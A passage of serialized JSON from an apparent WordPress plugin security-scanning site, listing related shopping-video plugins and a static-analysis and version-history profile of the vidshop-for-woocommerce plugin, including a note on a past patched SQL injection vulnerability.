sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For technical support, documentation, and feature requests, please visit our \u003Ca href=\"https:\u002F\u002Fimmerss.live\u002Fsupport\" rel=\"nofollow ugc\">support center\u003C\u002Fa> or contact us directly through your admin dashboard.\u003C\u002Fp>\n\u003Cp>Transform your online store today with immersive shopping experiences that convert browsers into buyers!\u003C\u002Fp>\n","Turn browsers into buyers with idiot-proof technology.",301,"2025-12-12T19:09:00.000Z","4.7",[108,90,21,109,23],"interactive-video","shopping-assistant","https:\u002F\u002Fimmerss.live","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fimmersive-shopping-and-videos.1.16.zip",{"slug":113,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":29,"downloaded":120,"rating":29,"num_ratings":29,"last_updated":121,"tested_up_to":85,"requires_at_least":106,"requires_php":122,"tags":123,"homepage":128,"download_link":129,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"digitalsignage4","Product Video Generator","1.0.13","Acacia Dynamic","https:\u002F\u002Fprofiles.wordpress.org\u002Facaciadynamic\u002F","\u003Cp>The first tool on the market capable of automatically creating videos from a product sheet,\u003Cbr \u002F>\nProduct Video Generator highlights your products, makes them more attractive and keeps web users on your site for longer.\u003Cbr \u002F>\n-> Boost your e-shop\u003Cbr \u002F>\n-> Increase your conversion rate\u003Cbr \u002F>\n-> Automatically broadcast your videos on YouTube\u003Cbr \u002F>\n-> Use them on your social networks: Instagram, Facebook, Tik Tok, etc.\u003C\u002Fp>\n\u003Ch3>Third-Party Services\u003C\u002Fh3>\n\u003Cp>This plugin uses the following third-party service(s):\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Product Video Generator\u003C\u002Fstrong>\n\u003Cul>\n\u003Cli>\u003Cstrong>Purpose\u003C\u002Fstrong>: The creation of videos of your products is done on our servers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data shared\u003C\u002Fstrong>: Product pictures, name, description, price, categories.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy policy\u003C\u002Fstrong>: https:\u002F\u002FProductVideo.io\u002Fen\u002Fprivacy-policy\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>By using this plugin, you agree to the terms and conditions of this third-party service.\u003C\u002Fp>\n","Product Video Generator allows you to create animated product sheets in the form of high-quality videos.",904,"2025-12-17T09:37:00.000Z","7.0",[124,125,21,126,127],"automation","increase","sales","youtube","https:\u002F\u002Fwww.productvideo.io\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdigitalsignage4.1.0.13.zip",{"slug":131,"name":132,"version":133,"author":134,"author_profile":135,"description":136,"short_description":137,"active_installs":29,"downloaded":138,"rating":29,"num_ratings":29,"last_updated":139,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":140,"homepage":144,"download_link":145,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"ieasysell-connector","Ieasysell — AI Virtual Shopping Assistant & Shoppable Video","1.0.1","ieasysell","https:\u002F\u002Fprofiles.wordpress.org\u002Fieasysell\u002F","\u003Cp>\u003Cstrong>Ieasysell\u003C\u002Fstrong> is the all-in-one \u003Cstrong>virtual shopping assistant\u003C\u002Fstrong>, \u003Cstrong>shoppable video\u003C\u002Fstrong>, and \u003Cstrong>live shopping\u003C\u002Fstrong> platform built for global WordPress & WooCommerce stores. Your AI sales rep speaks, listens, and sells in 50+ languages — around the clock, without extra headcount.\u003C\u002Fp>\n\u003Cp>Whether your customers speak English, Spanish, Arabic, Japanese, or any of 50+ supported languages, Ieasysell ensures your store never sleeps. Combine video commerce, live shopping events, and AI avatar interaction to convert more visitors — wherever they’re from.\u003C\u002Fp>\n\u003Ch4>Why Ieasysell?\u003C\u002Fh4>\n\u003Cp>Most voice AI tools support only 1–2 languages. Most shoppable video apps can’t talk. Most live shopping platforms don’t analyze intent. \u003Cstrong>Ieasysell does all three — in one plugin.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>No language barriers\u003C\u002Fstrong> — 50+ languages supported out of the box\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No app-stacking\u003C\u002Fstrong> — shoppable video + live shopping + voice AI, all in one\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No missed leads\u003C\u002Fstrong> — every conversation recorded and scored by AI\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No complex setup\u003C\u002Fstrong> — live in under 5 minutes with one plugin install\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Core Features\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>🎙️ AI Voice Shopping Assistant\u003C\u002Fstrong>\u003Cbr \u002F>\nReal-time 1-on-1 voice interaction in 30+ languages, available 24\u002F7. Your AI assistant answers product questions, makes recommendations, and guides customers to checkout — just like a human sales rep, but always available.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🎬 Shoppable Video\u003C\u002Fstrong>\u003Cbr \u002F>\nShowcase your products with close-up video experiences. Customers can watch and buy without ever leaving the video — reducing drop-off and increasing conversion rates.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📡 Live Shopping\u003C\u002Fstrong>\u003Cbr \u002F>\nHost live product demos directly on your WordPress site. Your AI presenter introduces products in real time with instant one-click purchase capability. Engage viewers and convert them while they watch.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📖 AI Product Catalog & Video Handbook\u003C\u002Fstrong>\u003Cbr \u002F>\nAttach close-up demo videos and digital product handbooks to any WooCommerce product listing. Let your products speak for themselves — literally.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🧬 Custom AI Persona\u003C\u002Fstrong>\u003Cbr \u002F>\nChoose from pre-built public AI models or fully customize your assistant’s face, voice, and personality to match your brand identity. Your AI, your brand.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📊 Conversation Analytics & AI Intent Analysis\u003C\u002Fstrong>\u003Cbr \u002F>\nEvery conversation is stored and analyzed. Ieasysell’s AI intent scoring identifies high-value leads automatically — so your team follows up at exactly the right moment.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🔌 Easy WordPress Integration\u003C\u002Fstrong>\u003Cbr \u002F>\nInstall the plugin, paste your API key, and you’re live. Works seamlessly with WooCommerce. Also supports any website via a single line of JavaScript.\u003C\u002Fp>\n\u003Ch4>Perfect For\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>DTC (direct-to-consumer) brands selling to global markets\u003C\u002Fli>\n\u003Cli>Fashion, beauty, electronics, home goods — any visual product category\u003C\u002Fli>\n\u003Cli>WooCommerce store owners who want to cut support costs while increasing conversion\u003C\u002Fli>\n\u003Cli>Stores expanding from English-speaking markets into multilingual audiences\u003C\u002Fli>\n\u003Cli>Merchants who want to replace static product pages with interactive video experiences\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How It Works\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Install and activate the Ieasysell plugin\u003C\u002Fli>\n\u003Cli>Connect your Ieasysell account (free to start at \u003Ca href=\"https:\u002F\u002Fwww.ieasysell.com\" rel=\"nofollow ugc\">ieasysell.com\u003C\u002Fa>)\u003C\u002Fli>\n\u003Cli>Configure your AI assistant — choose persona, languages, and linked products\u003C\u002Fli>\n\u003Cli>Upload shoppable product videos and set up your first live shopping event\u003C\u002Fli>\n\u003Cli>Embed on any page or let it auto-appear site-wide — your AI sales rep is live\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>Supported Languages (30+)\u003C\u002Fh4>\n\u003Cp>English, Spanish, French, German, Portuguese, Italian, Dutch, Russian, Arabic, Japanese, Korean, Chinese (Simplified & Traditional), Hindi, Turkish, Polish, Swedish, Danish, Norwegian, Finnish, Greek, Czech, Romanian, Hungarian, Thai, Vietnamese, Indonesian, Malay, Hebrew, and more.\u003C\u002Fp>\n\u003Ch4>Integrations\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>WooCommerce\u003C\u002Fstrong> — native product sync, cart integration, and order tracking\u003C\u002Fli>\n\u003Cli>\u003Cstrong>WordPress\u003C\u002Fstrong> — works with any theme or page builder (Elementor, Divi, Gutenberg)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Any website\u003C\u002Fstrong> — paste one line of JavaScript to embed on non-WordPress pages\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Shopify\u003C\u002Fstrong> — also available on the Shopify App Store\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin relies on third-party external services to provide Digital Human embedding functionality.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Service Name: IEasySell Digital Human Service\u003C\u002Fli>\n\u003Cli>Service Provider: Ieasysell (www.ieasysell.com)\u003C\u002Fli>\n\u003Cli>Purpose: This service is used to load and render interactive digital human video components on the frontend of WordPress websites to enhance user engagement and sales conversion.\u003C\u002Fli>\n\u003Cli>Data Transmission Description:\n\u003Cul>\n\u003Cli>Content Sent: When pages containing digital human components are loaded, the plugin sends requests to \u003Ccode>app.ieasysell.com\u003C\u002Fcode> to load necessary JavaScript resources (\u003Ccode>digital-human-embed.js\u003C\u002Fcode>). Depending on the implementation of this service, user IP addresses, User-Agent strings, and the current page URL may be sent to properly render content and analyze usage. If user input occurs during digital human interactions, related data may also be transmitted to that server for processing.\u003C\u002Fli>\n\u003Cli>Timing: Data is only sent when visitors access pages containing the digital human component and their browsers execute the embedded script.\u003C\u002Fli>\n\u003Cli>Conditions: The connection will be established as long as the administrator has enabled the digital human feature in the plugin settings and placed it on a page.\u003Cbr \u002F>\n*Privacy Policy: https:\u002F\u002Fapp.ieasysell.com\u002Fprivate\u002FchinesePrivate.html\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: Using this feature indicates your agreement with the above third-party terms of service and privacy policy. It’s recommended to inform your website visitors before enabling this feature.\u003C\u002Fp>\n","Turn visitors into buyers with AI live shopping, shoppable videos & live selling — in 30+ languages, 24\u002F7.",329,"2026-04-02T11:16:00.000Z",[141,90,142,23,143],"ai-voice-assistant","shoppable-video","virtual-shopping-assistant","https:\u002F\u002Fapp.ieasysell.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fieasysell-connector.1.0.2.zip",{"slug":147,"name":148,"version":149,"author":150,"author_profile":151,"description":152,"short_description":153,"active_installs":29,"downloaded":154,"rating":29,"num_ratings":29,"last_updated":155,"tested_up_to":85,"requires_at_least":156,"requires_php":157,"tags":158,"homepage":164,"download_link":165,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"live-sales-for-woocommerce","Live Sales for WooCommerce","1.0.0","interactivecomms","https:\u002F\u002Fprofiles.wordpress.org\u002Finteractivecomms\u002F","\u003Cp>Experience the future of interactive commerce with \u003Ccode>Live Sales for WooCommerce\u003C\u002Fcode> plugin. Accelerate your sales process with ultra-low latency, enabling you to close deals faster than ever. Leverage the power of live streaming to enhance your online sales strategy.\u003C\u002Fp>\n\u003Ch3>Third party libraries\u002Fservices used in this plugin\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>Ant Media Server and their SDK to provide live streaming services.\u003Cbr \u002F>\nWebsite: https:\u002F\u002Fantmedia.io\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Font Awesome Free\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Version: 6.6.0\u003C\u002Fli>\n\u003Cli>License: Font Awesome Free License (MIT, OFL, and CC BY 4.0)\u003C\u002Fli>\n\u003Cli>License URL: https:\u002F\u002Ffontawesome.com\u002Flicense\u002Ffree\u003C\u002Fli>\n\u003Cli>Author: Fonticons, Inc.\u003C\u002Fli>\n\u003Cli>Website: https:\u002F\u002Ffontawesome.com\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Krajee jQuery DateTime Picker\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Version: 1.3.3\u003C\u002Fli>\n\u003Cli>Author: Kartik Visweswaran (Krajee.com)\u003C\u002Fli>\n\u003Cli>Source: https:\u002F\u002Fplugins.krajee.com\u003C\u002Fli>\n\u003Cli>License: BSD 3-Clause License\u003C\u002Fli>\n\u003Cli>License URL: https:\u002F\u002Fgithub.com\u002Fkartik-v\u002Fphp-date-formatter\u002Fblob\u002Fmaster\u002FLICENSE.md\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>webrtc-adapter\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Source: https:\u002F\u002Fcdn.jsdelivr.net\u002Fnpm\u002Fwebrtc-adapter@9.0.3\u002Fout\u002Fadapter.js\u003C\u002Fli>\n\u003Cli>Version: 9.0.3\u003C\u002Fli>\n\u003Cli>License: BSD-3-Clause\u003C\u002Fli>\n\u003Cli>Website: https:\u002F\u002Fwww.npmjs.com\u002Fpackage\u002Fwebrtc-adapter\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Select2\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Source: https:\u002F\u002Fcdn.jsdelivr.net\u002Fnpm\u002Fselect2@4.1.0-rc.0\u002Fdist\u002Fjs\u002Fselect2.min.js\u003C\u002Fli>\n\u003Cli>Version: 4.1.0-rc.0\u003C\u002Fli>\n\u003Cli>License: MIT\u003C\u002Fli>\n\u003Cli>Website: https:\u002F\u002Fselect2.org\u002F\u003C\u002Fli>\n\u003Cli>GitHub: https:\u002F\u002Fgithub.com\u002Fselect2\u002Fselect2\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Prerequisite\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>WooCommerce\u003C\u002Fli>\n\u003Cli>Ant Media Server application credentials.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Seamless Integration: Connects effortlessly with WooCommerce and AntMedia Server.\u003C\u002Fli>\n\u003Cli>Live Streaming: Go live and showcase your products in real-time.\u003C\u002Fli>\n\u003Cli>Interactive Chat: Engage with customers directly through integrated chat.\u003C\u002Fli>\n\u003Cli>Quick Setup: Configure settings and go live within 5 minutes!\u003C\u002Fli>\n\u003Cli>Boost Sales: Live demos with direct purchasing options to increase conversion rates.\u003C\u002Fli>\n\u003Cli>Logo & Marquee: Display your brand logo along with product details information in marquee during live selling.\u003C\u002Fli>\n\u003Cli>Live customers count : Get the viewer count info on your dashboard in real time.\u003C\u002Fli>\n\u003Cli>LIVESAFO Agent Role: Allow you to create multiple staff or agents role. With the flexibility to schedule unlimited live sales, the possibilities are endless.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Why You’ll Love It\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>This plugin is designed for ease of use and flexibility. Whether you’re running a small boutique or a large-scale online store, you’ll find it incredibly easy to set up and start broadcasting your products live. Imagine the possibilities of hosting live product launches, Q&A sessions, or exclusive sales events! Ready to Elevate Your Online Store? Let’s make online selling more dynamic and interactive than ever. Your customers will love the personal touch, and you’ll love the sales report! Happy live selling!\u003C\u002Fli>\n\u003C\u002Ful>\n","Experience future of interactive commerce. Enjoy ultra-low latency interactive live sales with chat feature for faster and effective live commerce.",234,"2025-08-22T12:19:00.000Z","6.8","7.3",[159,160,161,162,163],"ant-media-server","interactive-video-commerce","live-chat-for-woocommerce","woocommerce-live-sales","woocommerce-live-shopping","https:\u002F\u002Finteractivecomms.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flive-sales-for-woocommerce.1.0.0.zip",{"attackSurface":167,"codeSignals":239,"taintFlows":256,"riskAssessment":257,"analyzedAt":263},{"hooks":168,"ajaxHandlers":227,"restRoutes":232,"shortcodes":233,"cronEvents":238,"entryPointCount":68,"unprotectedCount":29},[169,175,180,185,187,190,195,199,203,207,213,217,220,225],{"type":170,"name":171,"callback":172,"file":173,"line":174},"action","admin_init","maybe_redirect_after_activation","includes\\admin\\class-activation-handler.php",30,{"type":170,"name":176,"callback":177,"file":178,"line":179},"admin_menu","add_admin_menu","includes\\admin\\class-admin-loader.php",52,{"type":170,"name":181,"callback":182,"priority":183,"file":178,"line":184},"admin_notices","remove_notices",999,55,{"type":170,"name":181,"callback":186,"file":178,"line":94},"inject_before_notices",{"type":170,"name":181,"callback":188,"file":178,"line":189},"inject_after_notices",57,{"type":191,"name":192,"callback":193,"file":178,"line":194},"filter","admin_footer_text","change_admin_footer_text",60,{"type":191,"name":196,"callback":197,"file":178,"line":198},"admin_body_class","closure",63,{"type":170,"name":200,"callback":201,"file":178,"line":202},"wp_enqueue_scripts","add_admin_bar_styles",75,{"type":170,"name":181,"callback":204,"file":205,"line":206},"show_review_notice","includes\\admin\\class-review-notice.php",27,{"type":170,"name":208,"callback":209,"priority":210,"file":211,"line":212},"plugins_loaded","maybe_install_tables",20,"includes\\database\\class-database-module.php",42,{"type":170,"name":214,"callback":214,"file":215,"line":216},"init","includes\\frontend\\class-frontend-loader.php",33,{"type":170,"name":200,"callback":218,"file":215,"line":219},"register_frontend_scripts",36,{"type":170,"name":221,"callback":222,"file":223,"line":224},"rest_api_init","register_rest_routes","includes\\rest-api\\class-rest-api-module.php",73,{"type":170,"name":208,"callback":197,"file":55,"line":226},41,[228],{"action":229,"nopriv":57,"callback":230,"hasNonce":231,"hasCapCheck":57,"file":205,"line":174},"vsfw_dismiss_review_notice","ajax_dismiss_notice",true,[],[234],{"tag":235,"callback":236,"file":215,"line":237},"vsfw-videos","render_video_shortcode",44,[],{"dangerousFunctions":240,"sqlUsage":241,"outputEscaping":252,"fileOperations":29,"externalRequests":29,"nonceChecks":28,"capabilityChecks":28,"bundledLibraries":255},[],{"prepared":242,"raw":68,"locations":243},50,[244,248],{"file":245,"line":246,"context":247},"includes\\abstracts\\class-model.php",1065,"$wpdb->get_results() with variable interpolation",{"file":249,"line":250,"context":251},"includes\\abstracts\\class-table.php",58,"$wpdb->get_var() with variable interpolation",{"escaped":253,"rawEcho":29,"locations":254},22,[],[],[],{"summary":258,"deductions":259},"The vidshop-for-woocommerce plugin v1.1.5 exhibits a generally strong security posture based on the static analysis. The code demonstrates excellent practices with 100% output escaping and 96% of SQL queries utilizing prepared statements. The absence of dangerous functions, file operations, and external HTTP requests is also a positive sign. Furthermore, the limited attack surface, with only two entry points and no unprotected ones, further contributes to its secure design.\n\nHowever, the vulnerability history presents a significant concern. The presence of one known high-severity CVE, specifically an SQL Injection vulnerability, even though it is currently patched, suggests a past weakness that could be exploited if the plugin were not updated. The nature of SQL Injection vulnerabilities indicates potential issues with how user-supplied data is handled, which is a critical area for security. While the current code analysis does not reveal any active taint flows or direct SQL injection risks, the historical vulnerability is a reminder of potential complexities in data handling.\n\nIn conclusion, vidshop-for-woocommerce v1.1.5 is well-implemented from a static analysis perspective, with strong adherence to secure coding practices. The primary weakness lies in its past vulnerability history, specifically the high-severity SQL injection. Users must ensure they are running the latest version to benefit from past patches. The lack of any current critical or high-severity findings in the static analysis is encouraging, but the historical context necessitates vigilance.",[260],{"reason":261,"points":262},"Past high severity SQL Injection vulnerability",15,"2026-03-16T19:45:34.574Z",{"wat":265,"direct":282},{"assetPaths":266,"generatorPatterns":275,"scriptPaths":276,"versionParams":277},[267,268,269,270,271,272,273,274],"\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Fadmin-style.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Fadmin-style.min.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.min.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.min.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.min.js",[],[269,273],[278,279,280,281],"vidshop-for-woocommerce\u002Fassets\u002Fcss\u002Fadmin-style.css?ver=","vidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.js?ver=","vidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.css?ver=","vidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.js?ver=",{"cssClasses":283,"htmlComments":286,"htmlAttributes":287,"restEndpoints":293,"jsGlobals":294,"shortcodeOutput":296},[284,285],"vsfw-admin","vsfw-page",[],[288,289,290,291,292],"data-vsfw-video-product","data-vsfw-video-id","data-vsfw-product-id","data-vsfw-product-url","data-vsfw-product-position",[],[295],"vsfw_params",[297],"[vidshop_video]",{"error":231,"url":299,"statusCode":300,"statusMessage":301,"message":301},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":303,"versions":304},10,[305,310,318,326,334,342,350,358,366,373],{"version":6,"download_url":26,"svn_tag_url":306,"released_at":39,"has_diff":57,"diff_files_changed":307,"diff_lines":39,"trac_diff_url":308,"vulnerabilities":309,"is_current":231},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.4&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.5",[],{"version":311,"download_url":312,"svn_tag_url":313,"released_at":39,"has_diff":57,"diff_files_changed":314,"diff_lines":39,"trac_diff_url":315,"vulnerabilities":316,"is_current":57},"1.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.3&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.4",[317],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":319,"download_url":320,"svn_tag_url":321,"released_at":39,"has_diff":57,"diff_files_changed":322,"diff_lines":39,"trac_diff_url":323,"vulnerabilities":324,"is_current":57},"1.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.2&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.3",[325],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":327,"download_url":328,"svn_tag_url":329,"released_at":39,"has_diff":57,"diff_files_changed":330,"diff_lines":39,"trac_diff_url":331,"vulnerabilities":332,"is_current":57},"1.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.1&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.2",[333],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":335,"download_url":336,"svn_tag_url":337,"released_at":39,"has_diff":57,"diff_files_changed":338,"diff_lines":39,"trac_diff_url":339,"vulnerabilities":340,"is_current":57},"1.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.0&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.1",[341],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":343,"download_url":344,"svn_tag_url":345,"released_at":39,"has_diff":57,"diff_files_changed":346,"diff_lines":39,"trac_diff_url":347,"vulnerabilities":348,"is_current":57},"1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.3&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.0",[349],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":351,"download_url":352,"svn_tag_url":353,"released_at":39,"has_diff":57,"diff_files_changed":354,"diff_lines":39,"trac_diff_url":355,"vulnerabilities":356,"is_current":57},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.2&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.3",[357],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":359,"download_url":360,"svn_tag_url":361,"released_at":39,"has_diff":57,"diff_files_changed":362,"diff_lines":39,"trac_diff_url":363,"vulnerabilities":364,"is_current":57},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.1&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.2",[365],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":133,"download_url":367,"svn_tag_url":368,"released_at":39,"has_diff":57,"diff_files_changed":369,"diff_lines":39,"trac_diff_url":370,"vulnerabilities":371,"is_current":57},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.0&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.1",[372],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":149,"download_url":374,"svn_tag_url":375,"released_at":39,"has_diff":57,"diff_files_changed":376,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":377,"is_current":57},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.0\u002F",[],[378],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6}]